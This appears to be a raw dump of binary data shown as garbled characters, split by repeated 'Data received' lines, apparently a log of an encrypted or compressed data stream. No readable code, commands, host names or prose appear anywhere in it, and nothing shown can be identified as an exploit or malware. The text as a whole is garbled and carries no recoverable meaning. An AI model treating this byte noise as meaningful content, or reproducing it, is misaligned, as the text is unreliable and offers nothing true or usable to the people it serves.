s’“8W"íHwÏmI…{õvþÑÐUAÏI÷×lê„]zC®4Sã"úžâ\ówÆ@–òžÊInH=\¨šeçufPa]µ~¡6µî§õñ¢õù'Ê¿DVÚ+ÉD¤å~d½‰CiÅð(<¸Å4HŸ5öšé»ŒÐˆ²¤ÔO9vµB<À^1Õ´1´Ýc²ÃÒ§’ú;Ý#ö?ÄHF$šƒ§Pÿȁ©3~°fO©’ü‘\“&}ŽÝ¾»÷‡ý¹dÿçÄ lKæS‡ï+Ç+Í ”•d×NJóđDÓC^e>Ë ù¤ò·¸HS.„©19½}ÄTٿܘC&¨±Ø£ î$ouàðUÆϪRå•LÞCëô” "-g
Data received `’ed.KèBćü?ÏïOq;¡H’7Nµû}‰sÿ[É.qµÉÕï×ÒyI—.—ƒ ê—î£jš5©š×¯wê! €3Q³dŽ¿‡_r]®o}‘ º¨»—Y/‹­.Ÿ(fpý’ñòE~´.ϑUvX@sŸÍ ÃÇpë ÔÃU’'~w0>=7õD7âƒR™“a­DŠZgoPR\§š"Wy)àƒióßr›†– t/û£Ó9#]÷}xD­HÎÜ2e[YýûÀŸÙQ}l…i\»¦ÚjüŠnòŽ8=ãՓFQýËëtƒÐ[ BrTåŸRx’'‹gP’ȍÓo,1\^¤Ÿ.GNÑ kқóº=ÓÀÝy|:­;ËðÕú653_3XëfóµœE¾DøڟŠOúÜ/øШ&vß©¿¥×á¬bsbô½¶ªG°2o”ݍ·òiò‘œ?mGùŒœ^̽µSþ-ß\ÍËû*á2¶àšà¸smÄ,Ù'Õ6üŽw3¦u*|l?1Å«ûDƐ׳í=ÔnìÁ_Á––¦/ Dqí™ÓÃùâøEÈÔ÷ÍÊ£f‹V² ñ8Š‰ÄO·@ÅÒf†"KÎÀ°<à۔TÕ 0ZF)½VìO7òœ.†É~Ýy½Ҋ¡ÁTMܜ c‘C®Èó[#&Ög&‰’CI‹¿ÁXT8ÝæHq&¢là×´ÜÜÖàd£¬ð]s`â´PDYç쬔ø“,+nü‡’ò¯Ä½.ÄFÚ¹0¹»eUx =Û#õyŠg¤OgÒ"¨‚"gß ³CЄ“ qóoZQ–½Øm–mÖöRroÐm¶óHB+îðÚ(·±ùâ¾¹›¹d—È,vWIÒJ°,N~¨Hû\ŸÑ|Ò½$%IOtæTáj*/ð¤+Ämvshù•·öà ÄÕÐo–Ty ¨£Ø2k_@ RB§t{Ûó±my[ˆtUpñxNqyCUÈ|#³ÝCBÖMã âUœ³VQØVmJ‚Þ­k¢Ë³ëN ±tx’£Ëþ” Ã.c€†;Aœš<~L¢vƒzð©0+ö¸ÂäIµ·SÕú Ž >¢.´ò{×¥…uçGZ@ªZÎ<ܑÊÈVYZƒÿZj)­{Ì"%%n2>®9‚Xç=]ø佨0ÂûQwäÔâéèjøºY 3UÆ¥n½uêQ4‘0¤'*¤à´¾»×ÀgØx r4|Òí‰ÕÀ¶fÔù •à6é.÷áèdiº25åRˎò6Î í6’~&‡§ËÏûƕöŠT´ÏboèÞo±è€£&‚ÏæË»‰àÂõ¸ó6z~^ypÒíß© :Î^ZÎ-¯¢6D°Wò ‰ëթגx®6ÉYBáïTùÏro’õëµ£­‘K%3;0Üêv~Ô[¼à™Èmvý°NÉkÒc´Ú yxTÜ|£ÏúSµÏ5²©üE~ÅõþÇSHBIOÕ.¯¸†dƒ–^rv‹ôÝØ*gÁév5KC͊)ƒ¾å ¥ô›UâܝYm ú~D+K<QŸüÈkä‡O¾ Ð`Úßx‹;c£Ì* ÌÓXk|G‡WÒXçà*™3)šÛ}‰o"¢|Siˆ5F ¯Óz‚XÛ¡D =TH2Ù½\b`*HE‘qµÅr×$žýَçƒÖ_än*1µØÔFÜTlÚøۇ>QÄ¿É·ð¤ Z×Ιf6TZéè÷vÈùæòîú¥ÂA:òKÞ%ű{_'¡Ú ¶$R
Data received ¡Äe‘D6VÕFÓëîÇ0*–mÑGð 4xó¯…YÑ õî@[¼ŽuX߯¤òˆŽhßPü’;‡©‰AѾ1MÜ¡h¨(ZØNυÆã§kœOA`N»da㫈f…>ç¡LdÌâ5:Y:òDzô°vxͬ9›C/4̹€â±M“ýàۃ;Ì¡N™V„gÛp)Ï,.»ê¹h~7”ÓÆ(Ü!x뾂!¥ãÉÒº8²°ÞQýĪMhöéˆöºòpš«µÔ1å¥|ý(”C‘u«î1bï$d¡cyq™„ ò¸ȟ…­®‚‹9\PVesp–KLp¸øYìþåã½ê>©6 ôƪ#3]ˆ/ìT…ë÷ëCQ¹iŠ‡»åk‡ßÏË…‡¦þ.ÆÀÜó§.“r]`il-` ¾Ï)éÁ,Åâzêjíšn­0ޟÄ?:‚’­9¬7€l±›UòIk ~dúaoœ:[%‰EÅ¹äº A’"Emìäsñ^QÁbÅT£)WºXíY{’³Ñ>s<ʄ¡\¡+ÕÙ«­_ÁÄW!Ôܔd†Q»×›œqÆ]­¸˜ÊÒ¨/MãI¬ŒÚ*C&ž©Ü±UXNÓî„:½iˆ—]­–²ƒpÆûÖÜd(¯÷¸ÊŞuõñøF³1¤ë§ki5¬Ì©(›`/Å?ƒ™Þå( k"ég[§U.fmºá“þ#Šcr_¾¬Ob¶c«Uĉ²2*?k)ÜÍDQë£Ê>GeεŽ†yQMj”:¯ÑÝP<ýrtä­Ôšn-$bAxó A&ƒ¦¿æ5"†¡Ì¸¨+ðõŸ„ý%·@ί²££6rus¿nÛÙ+ùÍ7ïhj"1yÎß¡ˆÍ–¤•A½– …J­½®©맾(àO7 8XùÝ»Ò5“ï¡Pŵ”ýÏBôë$Ó¥ŒØ€ë<åuÃ6Êô·Ô˜;ï4Óe_»Èü­o蹛v f“WÏËË1ÊcqbCECQS}Å÷ãþ.I¡Jq‡Ç“1>AðÇ }u~mm=Ö¡:ãæ[â,Gýe_Ý®Ïú”`¸ 0‚vó ï‹ ×®ì±¬þç½\d“ù¡aèBÖ͆8»&ˆ(>r °Iºë[ÐlóBfx7ÀhÜ2d>ªHß=|ɓ‰§œ£Ê<‡¬ÆB/xà[R'à‰g© ¿UPœ)yʈ¡¸3cP«+Ç9ïà—ÑÇ؎YLñx¦Õö)C»}ì¼Hïe;jÔlÖ.ç+WòÓô$‡×C6(ÚÏvI þ¢‘ˆgbÿúP©¢zÙ&è36¶#P#að>­u ,3e'ò«ÌXÖ¬© ¿ôÚÊ_ ^ü”öÐnåŽÚ@Ó *BǬîL·Hµ¼Óœ³'^vNh•=Ç . šÄ‘&öDÒyÅ-0³)û—+ pHW4'Cɜ’cÏ P8“‡7,{ÿ…ÐÄIþ¯½ÿU߁«µÎ¡‹¬,`Ýã´‚pAäÝV)§j‚2—œ€šÝ¶nH/w@€Š7K¤üÎé@:å[HcbsßÙí øÁeӔ ‘`IâF,_þ¤5˖=QÓkx¡ÈåÁ“@(ÿ¤ý¬B迱­ä®lÉ­™ÒpöÈsoÒ¦·föNjTÙ$"GMª<ܯxN°õ¢:*†/9ÄV¥Éà;9 Á.’·“„GÚ'ƒÌG˜Ì¾È?.@©‹Û-m§|/×è!j=Œw˹ÛK–™¹é@9 ã[ÛµˆÐS_LÌÔàÔç,ëՙè
Data received ´ðŒW¾ tþµ¾ÝºB”fBôÖ¡t8ìaŒÒ g"Cºö<úé2s °Y=kß㯤y2câ™h«¿Ñ_$|ú)ß´I9RÇûBãŒ`£²Ç`b|XØ­NYLÙ¯\Ô5…ϯŸ¦î³ìqïug`5n;!Áül†ýÓ-Ÿ¨Ñb}~¡, )‚¤WBÈXƒéªiŠ[eIsùLtçŒyÙ¨U´Ce‘I]1@e]y†]ŸÄœúYGÁ N属 b֌ݛnª–Èu,öý7UŽ›oTàð¡…àWZø2³%µ¶”ÍØV³/úKÀÞkÉ,þc•El³HÖÈFà‡ÿ#jd')joŒ×´<§©èÕñ¾56ñ%½[Ôä÷J%EŠ‘:ŽtÖþ῕ûê-øñвôÅ Ž<“±o¦‰¥55Øb‘L9q<½˜'‚à;ÑõLŒ1Z¸ö¯«tϐB%¢ ðg± è·üt·ô³©½+…©÷¥€cF°KÆ%WøÉc“d™+NҕV¢R¡LnÂàðçq›ëoA[¶q;Mô¦UÖeq‡àƒñ‘0Ü=5C‹>èó&5gÄ–ñÕY‡F#f—NC[÷Ürj)w¦$ˆÜ^_NÁ ÈÆï ³ìÁ‹w˜8šL|–óžaM±î¹#˜ÕLÿéåÆu+ÝȪ}{ä-cÆn_ǒ8‡üF “»ÕÈãRˆG‹§sÁÐBÔ9ۅ-0í´Þ‡ÿ„ ÜöæGà5•O´nå»T„þNÒ¾tNò{À$1b¡ Ÿ¿;àAvÊm™_Ñ/ÑñIÏ®fÒ;É77Ā[‚¶…g÷7„©ŽÏIHÖ·¤ò665ƒk€Ê|P´a ®@F´Ÿ:#K|EÆ֙xR7ÖÍX¥0Y&Á0{âä°CÏf‹þQµ^Òh'sšþõOɒ$àÉê­Éé 0ñ¤Ä‰¥Šii0åÍ;ˆŠ„gN——ÅN|C²\&!©ƒø•-:½š¶ӀØw ’\‘¥z¹e¸#Œ%^hƬcâ Þ,91#­qÜCÝxè†HäÛF¬Pi·šú,C§E|¾-»´t·¶8?ý¢Bò{á|œµªÕaÖM¬§ýæšÇs{=w\»03À»3†Õf»™‡ÞdñŒÌþ£ñ+D»è(¸c™Ãú„ª:„l²ZôêŠ-&D‰%?ŠâpoʤRŒXÄ8#—´Å½,v'õç`ê ޅÄúM 趙qˆãb–¨œxˆï·4ê¢õåï΢QaТ›nÝ«¢ï6%Aá22׎_2HA¦pƒtBÔ%ôþL x=’òUÙ³°ûǨLã&¤“Ûôz9>+áræ¸ÝIÜÂÄ µ—õ÷49Y©ãSð Xzµ¤÷I!ÒX“ãn#•hR©Ù4þô~D૽¯X²i_ÞüóOõ6‹y·$‚éÞº+1ƒ:l0ˆ•µ/¤Íûb 1Û{½%~ÈfÓÉC€/$ˆª Æ6X^@3ì%µ>'ÀÜéÉ2Âçô¥CÊ/Òùv÷£Ú0Plúìå‚#ÌJ:ê’!ä—!笞9·7æS¸8ì‡pË”AÿKð³ ËXÑuYÎ_ŸQ[{Àò/¾F=íªy{‹ ¦¡|¯¿γEè‡}TL˜Bè•ÞCÁ¨‚þ è66Õ<# ½·º){jÉÇKuì–X¡Žš¸€ËJÔaŽÑÛöêV[Äçd8¥!:ø«vvº(°fËþôç½R¶F:SÉB+r@È3Hr°KҞ6ñC‰°¡
Data received ûæIœYíÍJ9œz"5sLy˜˜áç^dó)¿Á¸ÒƒTõ‡¾b Oa«)ñ¥™>½bK;}iÄÃ(OÖþ°OMK—Š7áäøfô﫹÷낹­.*e‘qwR®ûò«Y^§¨ŒÙހi¿²n¡}j×}7DéŒáSMNŸÚ  ±¨´€Õ¤™p9v.CãnC³:ÐÊU‹ |²—2Ëc½ØTJˆÙh×+…þÈm±¨5º£Ñï>:ÔÑS,Yûâˆ#__(EŠ6¼¦'Îvž‰`,”–Š¢‘K:®8ž–opy4–Ë.‘2÷ÔNá°ý ‚ÆFý~€Hó~›…ë›b¦=-âBYJ~+ ÕÔòtbâ8°Gíþ[] ¹Ä9a‘æ|Šo½=w¸"•Ô$kjB¸ôAs,Ê+h+ N'3Qàç•)÷Ci H‘WQ™€’ý³þ{DD|õÎ%_ WqM$ÿ M_¤ÒOi•–RvôXÛ|~V9ë,Xk¸|L?¾Ð„Ü!•\ ŸÊH d3QYx\·ö!Ri çWÂÂ+¤o³â¥¯¨­âYóì_‘ i nÅZÿ^½ò“–;F÷ £*Óx+Śm둨¼j¬)G„l‡ýûÙz¾i <¢CÁÓÈoî¥.]“mBÎáà̇ÿtø´®"G¡¡Í/Z¾Jà@ÛH \žy§‘ëeå<P.X±ûG欱ûT ( ¤ ¢Š˜b”FSƒ¡8 |ö|òUV ˆÄĹÊa;4üçâ¸tþó€k:@LD|0ÿ°]Â2§›zõ$Æb&¼ZŒF†ªŽ¿;âÕðÒ´K N0ڇ'ߧŠmÛ䃊™Nö 8h•ÃV ·¢ÀWºÍ~ŚlL¥µ1\. _tHEç&|.G˜ü§BÇ>CzpôL2ËéÖ0™a\ñ6Æâƒ]=Ìtå!]Þfí]ÚÊXq;ôr×Ҁuíë[9³¥+&z5-èçÁ¸hëˆâýþ3¿X’WQM®¨üYú¸±pì¬fH[‡@-Hü 9ùµ†púÅÅvÜ{¤(Ãý¶8 á¢ò œ_LØzá./†ÄR2V‡-=±Ãă–Þ;ª¾<®—°U•AT‰둳lå†5¥›Z“’tªê*FÔÌè¶5à‘Fm!üÍqKV8ž¿,:P!õ\ÎÈÊ3¾ dk²„,å‰N·–öÎGÀ^CÂþ¹l똄 ©Xs)íh±K^‰æú—‡D>´"‰ìt ì©93ŽàDɂsíî™?X¾Ãã áª|½að^õh°øü˜„ÿ6ÍÜû,pM¦‹| *Dyé&R¸ëSA1VóÁƒ‚쓽¥r<Ôù`³1çs‹¢ ™´=²ü8>€½åN>2*ív)Ÿ. UŒ |©#®ýÛ¿Ëòýó’~Hdšþ¨³ñù†’_ľªj5÷y–êøë@wh.vžY½¶ö[ìíˆuDô.Eõ‹¿T&éa13TQ9‚ÑNU™4è,¸í¦m•5{̋‡°=d×N÷t4üɳNz Ï\c~¡{hOç—6r0Q¬ï.¾¨c’…e“$þlE,Ûu›õY (m‘9>@L󣨩l§ÿ. ½™‘ÅR›ÜÄÞ:—(û8vôÒUÀ=/ 9C´W)›^@Q–?@Â︍¸P΀ÈÈQL¶¯>"ÐRÿ%:ï يÝ¥º-”–ÌNžÃŽÇ Օ; ÎÀd•Ÿ‘ó[´dÈY¦ÐÒx«¸&Þܒ×ƒÛ´…
Data received 
Data received Føqd:Š–ºF!'’¤¥©e8E`ÐzÉ€iDujÂ}ÏVϺBcóÊ=1Sž™åJOºOoï|³æWmü{CóâA°Ç}ú㪥·Q¶‚·V*„¼¨×b"»]]ÇJV+ìZïç¹ÍÓIÉÔg}­+ðýNŽZµ¼u^Rtˆ SÓ·뀪K€˜*¾Ø Öxl©’ —iZ{c¤ùŸ¨ªþN‚ét$Ó]ðR1­!8?ÒntÞ~hJD€ˆb‡©TE.„siÂîñ´þ|þä×ê GòIʒ}/—üx  Cg˜nѲ±£ˆò“)Ùwr OçF Vì÷ßÄ'C$¶Xÿh;0;¤@ёÏ'× Ž’O;
Data received ùœ¾[´?ö}©Ôsé?c`õ֜‚ -cŽèVª÷ÌÊ.H¶9 ½„`é)ÍÙX«ž™!lO LH±°ƒ¨pŒPºò²ž²AþTa%è娧¨ô[ö¿Æ[C¯prIc>º[#°v!®tç²?Ò?SWqmÿ®&֘L =?å D‹ûqÿȇæÿ¤ö¢­ÊÚÉóÍÊ.\’åÀêYÙyA`cOV±°?£W@ÕºQÜ>QKíÀ~"ÉwVI%êßÜÜï sS jûr™øe©ôݬn+mmÙÄkZ.™ zÍA×@æ¯Ü ©‡„Q.}ä­`,×ÿ…?;ÔW™_á¿Õ«WŠ‚ìEfT™0l¸é¾½çK°5„ÚÃÖ¸E¸Mê üÄò&‹:e½W(> -ØçVßÂvj«Ò"EZˌÙ_Eõ ÃwˆP0´˜”éGàmÒ´ÕþÀ¤"'…YJ#*è^ÿªø Ö®—ÉÌ_c¹)9¡%#3Ëkœž'Œ¿v0*ÿŸi‚ÍJN…”«f" 1q-°ª˜À´Mg”môýÁÇÌiœéâ(Gm¶¸‹wê4(ñ[|C墅‡}—€Z «›û‰á`ÕP«ÜL°©¢—l¼J=­d§Ä[)<«¸š¼èÖbÕíHud)¹ÃÇÇBßeÎÖ|’Ζ…güBRpD΢òÍh¡òòÃQ©@4èsÊáã |bÍLNÈó$"F1×n>jé†$3 B-Ú.ä¦ð¬‰WM5õÃ×Nj(…Ì–°dr .~9Lªîf=ôƒsµe=×(· •g]z>N,¶i%X°G–]÷AЖµ ¿¯iò?ʆµØ…Ó2±±*º"U5eŒ•N”ïüñ4ökCÊ7µ÷öѤôFº#è‰Ib4„–›¶D!Ï}´ÿöÃ+€#҄U”±õ¾ÅS]¥@Bnò™O.jú[,oŒ&HÔ¬ =¦ÏÎÛq$›ï•ÑŠF™O¡ÞiCWr)12õ Â[‡¼Yx†§2“’ sN›ýE¸MìM̹z‚¥ ݋¦mw{Ô&,ÁpÚࣁ>û}Új$uÕmVZ³:k~ÉPÀÄ Ÿ)™Ñê¼Ç‹ øRI-·`NJý<X8ù®ºÚõ|þdž*eËPˆöYÄ[bÅ}ï'ˆ ngv”B÷ò<ë_.eKZ½ŸÔj7BÒm"OLNqŠÃ»ìSêVD(s*°ƒIr¾¡üWï­?d'±¥0á®0xæ]Yõ?!=kWqpŸ·×Ñpځ]±½×^‹†ŸS­K®ù¢e†Î©Ît d•çïØI4\6üVítCõš ÓBIKT½Ä˜eSÔÀÖm¢¾rþZ*$øHÓj|WYOÅ×±j w…þÑ U+ ÇÉ` 6ÉjûD.N #í ØÓ£ÉûN-Nöé0 —ùÿ,ƒ 3±ñ[;šE0 ~ñј„¨KðÄþ9§ƒÂ§C ˜DÖXøÓ+Uف'·èX[ò ޗ¡éòxɾC`WMãwZÅc]Cç¹”æn¯¬ªjÚhah%ÂÆ*ûB@F#üÓñ9)0“”å8û:§Abd¥žeȾEo€tU^Gž¬¡ÜÇ[ Öðï5}=æ¹>Vâþ¥ˆ¹»`(€­Ù£Ý­N;è@è@'†QߛÖ!j8n$cuëÑÅ2ÒÃD‚̍ž*æûˆ9.¬˜’å˜y¾4B37I¸€þÌw+~SŸÇèŸk]¯!4»y«ÈÙô?ë—Z†¤!ˆ”FDi|¯^èl‚¤gg
Data received ¢èJ¾"M„ Po•ðÎݗÎ(ÿZLƒ­‰û™{Ã!ºnÃÐËÏØiB{Fó¡\*£˜£3Óf9[)OCþï ÒT|ü™ÇÔP7C»>ÄQ®†¥5k0¬Y þ1ZõùY2ñ±¶ýkqã^áhù*ûvʗTïøùBÈ÷…ÙËÐvê¿øçÔü‹Ä_,žÜ‹ gwÂNôÛ)ÊO[i}唥wÚjß#êƜLÃÈùâ¨(+ë"»ípdü2‡ÕCˊµ=”4Åòl@*pÁ iu%¤óÂÏêÃÚòœêË Ci·ö7gwàŒ©^.P´&~®w%«4Ç^ˆ.H«K´žà¢T‡)Ó9Œêu¨{·1ÊhÇ mJ+ÅÒ O8|Ȃa͋RÚ½δPØÍÞãÜ{ß;ȟC%/èvqDC2P§ ›âÿ«ç$Wn4ʄÅ\”п9^ b@Yã Á*Š°ë+³Ø@¡"¯U€¾Ñç¼{aTqE 8²CPÒnþ°‡³Ñ¡™ÇÔ}†—YfNYî{švx€N¸Lŗøô«î)k]ðh{6qÀ?w~Ý9‡‡&¿Ý…¸jýj.og7oáN§¾©¯¡~l˜üóBo¿£ä~ôSÁP;©î[ì»åIslðj™Käß`—ãöᜟoô<«œL…Z¥ò¥§ÛAÇR4$41͎%Ù֎s‚Ù"Fm<g6oÇ4D/A‰ô^œ¥…>75žÊojrÈPxê¢pVìÄÄÁÔ­ÉÄ|û4…ÂþÃyÈêª1Š©•î9ï{Ŋ}—½U¥Ù’½˜–_q°ç¦!NãÇ9;«Ü•VŸ×ZuÖ 'û; ôËd¨Àß*´Ë®|lÌ­? OœÈ‘8Z¦ó\å›U×f@¢S†Vá'ŒÙ0Ú`ƒ·]döÆkï-5¨Ûdï(½†qj֦ĿIK4'û|‚7ºù•*–š‡{ƒÒúE™M^ߺ—ÑÂux[ª£­ûw÷6óÀÿÊD¡&™}SñxFñó¦•y×Äíãtj佑~ž‰{uÞh“Ï¥þ„ … (!në¬ Žo.Äà'{}.úL33UŒË€èÊ^U 3ú°Ï4Ç)ªËûõ¬cwÛZyŽ*Âԙ*g ÐєѾ^$1$„¹uœ9ÊY€W̎½}°?¶¶#5Ô×䣬ö8Ԗs:;¬°ðadšÖõ÷u¯ÊXø ¿\ ªI&2Ý¡‡½™Wù'šÝxãµÿvKŠ’÷ðnÝF¿PóêÓ,¹vuÀ¤6Âm•ÈSCI¹É–õ1øðZ&ÂÒÆÕÚy=t²µ ʓ¡ã` ŠÑ(ª-¿1DpŒ/Kÿn7¯¯`&I gßæ#Ûd<IZÖóؔèޛ»¦©©ÿË!ªH–& ÆŠ|üÐïòzNÿéøåeY"-(†>ZÖ › Àv|,?YžEŸvžp/Z8DMš‚&c'€×Vûì©%€ë?~Vp"ÔN¾ÈA¨:IwŒó;¸×°õVöç‰lV;¹™àákö´'–Wå–û}Òv.XßT$ TŒºúÀ–¾w‘8¯Éi~þ CðÿW–²§óö•~ëptmµ¦ÊBïw¥›jð/‹?iCX6ªlUŸÀÊ=[«iÂœ7Ð8„l[×ç‚ÄS昡kþ)Ò¶æ aëÎx¯Ïa‹¯O!J^ÙØ:È°½c¹aä[š»ù—IÝX_ïf¥d¨-…†»a×?"x³öî‡\m3
Data received -÷”"³4ÓRŠO—ƒ@†¡» ¹€¢hâÞ¦— £ß'©Q ¯”PàZˆx@ÐX¸ Áà©çä+/u_.ô# Ø5xA„NÏÂd>$åÉýØ«Aďs}’9ætaZ¯ÃÓO!È z<cm=¸ZJU› iW.u@§Gü&ÉTIËXËFZҀ(ÄT‹&P;κZ*:¹y¨•Ü) l ´_yÀré¤Wô:…ûÀ9U^oÄjU0Þß«É=;ï>ÒòÓZóUÌNø6@ƒ:ºÉÈÈ}†syKyô£:lO_4\¹oãétR0ò`ÿP¥æòúë÷I¥È¼×$ÛJçï {º®ü·À6° U–k@ÀPü‘C‡N©|B¬ÈÅ®•ªÇC™DU ]ú>ü¦?„Ms*òN¬ñ6–hµPP7 ¡„.)c[A‰Ë ŸR«@+2‡)ßR°%êöÖÆïê?μ\c4i½‘aðó(N…²‘<q”ç×Ŗ3Ìõ¯OÇ¢1ÙÙ<Æُ2@BiÙǛÖaù9Á0ˆßY—+2åìs\.X>%.¥—ƒd1²4PB3£tÜ÷ôU¥2‰ËÙØ>Z_Ýèp)19§÷n°Ê V˜Ê³ý¼müT"eŸ/<бŠ†×?xŒ•¥(º£ix¹·ÃwT#ªÛ:çô ×~Óó’H3,ö¿r$ïø½l<ޖWåí; 5“ù/÷Hqe»íÓ¤Ã' ¸õE`’Líq#2›2‚‹„¼Æ‰‡¸Lœ:иh›òÝköe•â°ß^Œ¾ Ë =ŠßÉc{¯—ç™zŒa¾éõò‘¡#t#ƒø>V2²Võ+ÞG¯º’x«t‡Ü2mpkEG2¹új…é•wV™@òZVÓéyd<rÌÿdv¢ y;ÿŒI$²*çÑë‡HîYÖt,¦,'« W•AiéÔ\MÒÇÉ©ñ é‚;V±w°$ï©ùÝì³ÿƪ’¾ 0Ã--¯8 èWNUœ…t°C+£} JØ­½/43Òe~w©˜4ZY$–²­ÛtPÜuprz¼dýûô0¸Ô%Ù!ež6MX¨òo”¡ É÷‡ž?œl/Ë¿‘6´IÁç‹m‰lޕTDŠa|?=~‚5„÷Û"àSÎ[÷ã5°ì'fŸ„酟3¨@¤(û6  âÛÊзc‹ZŠ•ï»þ.z§IgrƒðßOÕµ~Õ¶7¶aûÌ:ýz›†dû’phYØ&üÍs©íØY¨F–AšVw×pþI*p¡f8¤ïO¿ýr&‹qžh,öún_úã”»ÕXfó֐ÖÑbòßjê$7Ÿ Þ9¢X;ÿ Ù&"ƒB·ÌÊRYž°ÊJ®vחG ÇV¢–I|Ÿ…Õýàùø0”0êiK†™AC‰Ù DÌ àXÚ暁¾ÿžEÂlùY}tt”:|Дõ9ÓâÄà#XÅ6K`ý…ónvEgd/*dlÖ>;L$ÑîZACÎðÜÈߦd•–%frҝ NºÎºunÒÕB΂nN­~Ð+½¥’ŒªŒÊتeø)-óRâ5@x³uÃ=©hUD¬/K~¢?–G*®`Ý1Œ$lüJBwóRˆ š½ÊFôjÜÁ ­n ž<Ĥ*öãBð²IéÈËk)ÏÒ£á†Ô,IŸÒ×RõR±¦# Z÷Ï·Ò-•äÿc)HϬdDBHñ÷ÇÄ.Ω]… Þ¦„½m˜Ì¿™ Cਧ‡ã3ú̄O‡ïÏI®‚·‡„È=ý}Ëv•Y ‹Õ?
Data received 6À¤Ÿ-´ÙøŒÎ4Ôù¾xûÖ{jŠ7ãŽÓ¿5µO/À1k$ö3A"ãk+T˜¿SÃՐæ e|ƒ7dv‚¥§¨ôH&…,¡ýŠ?«#ȨWúì¦=¨3+Oþ¶&!]^§‚¬>/Z#õJïBw û:4ÿ7*S›uÿc?mɦ–×¢?¶q€Z®7™4(ü ¦yNjVQ&7Yy ŽÒ¥ËÏo¢³¥»ñ»Z¡×Až0*M¼ƒ¬¢Ckàºöæ±gËF²8Á’õ0Lñ\…ûŒ%´ r h‡|›Ù9ëíEÈƒ4î֍ÙZ%ɨS©¦juÔøRAÍE“mm¥£îŸV¡‡'S#Ó\Ɉ1ΪF]¨[DȀ’Ò½­ÇV a1Ò'< _„¤ºñµ!ÁS™°[ΐb“íþ­$.å‘ÉpÓþ^½ÒÌqê.½5¶Á¡q-…#Î ´á5(ßSÎÆZ3x9MJ@~a $°+ÿ¨c5Ä¿ñ²Ç8›|dI](àªóg)ϲ¸.Oá™0ÓQÞ þŸ¸,{Ø99×£JdÙƒ’í ¤feÿQ£ô¯`>Kâ.I{í ´v 'K®ZyÊ­¸¡ŒhÎíö/±æAMWyµ¢lUÞ(f|"Óº•iy2úx ƒwQa"›Ôóä© ¸;)Rnïße—‹ˆ<_; 2Ë;HÎud¤:¼RY¶FsÄónjÉua¼÷@q ¹ÃF“~lÌ,¡’Ñ ¨²ÿçÛ¸p<¨'úg=Ûú•[­àë»õºUa);;LGî8kóV:u'Ûÿ %³\â–V-eäxÏþs€›ÕÛï0(¿aý^g[9YbÈto¿(ææÁŸ×ÖU-)xœ3‡#Q¶÷|Nˆz)¡ÉqùøŽ‚k½Ü*[¥vIJÅ°?‘WR4ÃÿHðþ €\çüz ÓŠ»Ž>0—?ŒBšM”¬“¬sy³Sp1ëPI벬ÎDC€€hM ›u‡ÞŒú‹þ_âPÀg±çù#mi@iÓ4r> ­Mp¿ãʈKJ«^dº¸€|92gk§”;¤Ð„%½)”žZ}û\,¤)Š1otìô*ÑV­³®‹´ô…HNctD»óç%ψà:Ñ'âѯ’žv½)ÀÃ~þS\ž õ–2s†Jï«£.ý¨L‡µ™\¸Þø}ô̇Oß²;>öüHF󒤉Ëjž¥@º¥ÊZ³p$Y%½J•æœ/–¾‘Š›½4ÇìWÍY† fG꿡Ԝܯoñ§§ƒ4h*(Ñ­·áo+’®“š¿mík‚Cº"Õ%2 ˜ié5·ÀdWP·ÉAXkP½%˜‰Ìu\þµ¬È›‚÷³¯©ŠÍHäÃâÖçÚÖيÑR@Jnú¡0#o™×ê.eµÜ†wYèsiÝÆcÚgJ2#ùØ¿…RÏ©© J]0”0GĚ°¥b §Œrk.ØžÙyO6©Î; ‘³ "°J÷î=(užuc?\„ƒ®!û³;û8¨Õ -xh$ gÐ º`;Hÿ‹©/'Ž‡vP:¼3RÉP¦³&Âg=,>uì Ããú°~f@8ÚH—k•ØõÔçDO Dgo>‚œ¹Ú½]DïùÐmkÙà['¼¡þ ¨!·ÈøŒz{\’Ÿa[¯ÄàùJ’_ZÃúxÀ Í†©è5”_LçFî?žsŽ#Éáè҅[6˜˜±%0ħ÷€ ƒˆ²°RD.ywðr;'ïÙ _×¾ªïX¬ÓVi¬l;(
Data received Gò¶í‡v˜m¿¢÷ƒ”¤€H$ 5[°ª“Ãô’Àné2ÿ²‘ ˜ˆ\xÕøò’Aa°‘Ë’ÁŒAU #e|£Þ·UBaM@O=¤¹øß.ÙÛöWÞNœpEéD¿—È̀HYæö¬ ´xžvðƒ(¾¿ÿÞ¬ ŒKùçœ%£{*4®l-4àéøÑdNzë ݎ^½× ÖƔ󢒒¹àrIÂ.—ýӟxÊïÁ¾ßðƒ2?®c‘¾§˜„¥[q™Æ‹nJè ÿT7ÿí)A hQÍX>\w¤™Yò2ÆN÷¿×‰jþ“ÊÁ€&|òì¨;\… Q¾ý½ÕûÅ6wN܂t¸ÒØí;öŠN8Bת͕Mú;)¤ øG eê…ñÀ«G´ŽƒžÏŒšp¡q‡1ªL›2®¿{(‡ê9þÝê]ó)QB°”RÏo[*Q15‚÷µ°l¿s‰NŽ‘Ԃ™rÇtÎGLJ–-¨ñÿ5jï¶7Ř‹´˜>ËÒ<sªD©_‘:ú;‹ ¬gÙÝl$À¸Ð7E£œŒ«J190hP r‡»”,Ç<(iîqï¢,LÔB]ÐԊU=Dž­½JÖ¨ŽTÁŒúiBU‡dñáC­ÌÀ7£ÊÙkc©àƒ€—DË2„]“"“JîTˆïñ]>Œ] ]QŠÏසËbV Äe~Tr'ë5à•Yæ®ÍÛ|4_–¡ùºh¨ëHSîþaú–ypà³ÝØ͵ø½¤>hXµ{Ëë§+ÁWÄF @–,%sÿàŒIÀÐ0Š>![µñ—¡MT\ye’5¦!i VÕ iƒœ·îàÃ) p›#L~lÇÃ×KÚªü†aŽ¤ÆÐܝóït}xÊñŠ¥¿!í˜Þdt{|ܯR²ÔБŸ· Ɗ'Eþ<å¹Ü 쬗ÜšƒÜ쉘uˆÜ©;e ;U…B›Ë}uù¼%Òáz^–¢rÓÅL¢bÃðAÄ÷lQñÚ <čZ;>(˜m¹ã¼?jE’}5]ÏÉ}»*e _:ßb™K™.g¤ HŠšI¾þD˜¿²òut™¤9¿Pæèú% dÈ7SuWYa` ¬¤µ¿Š†9ðH­ñ$åÊ4ç„[¡ GdÖLÎt~)2òM6鯷¸ýp<p/8Š)›½æ]ÅøƒÖ¶Ü’žƒÑ¦¿å7 *"!…äR~ªgF ¡ÃѤ,¬USëQ»Ÿº.ý¯‡Ò°ÿ<Q°‰»t^Í®ï8 ¸HO/p•”² ÁûÛæcuÖßë¦|ŠGæ9@•‹Ð«ˆÈ¥%&^MNKÚÀ¾*™úT.ÝÃÆÔʆ;8EõýÚðg·xŠu+3)¹­¸ó;À 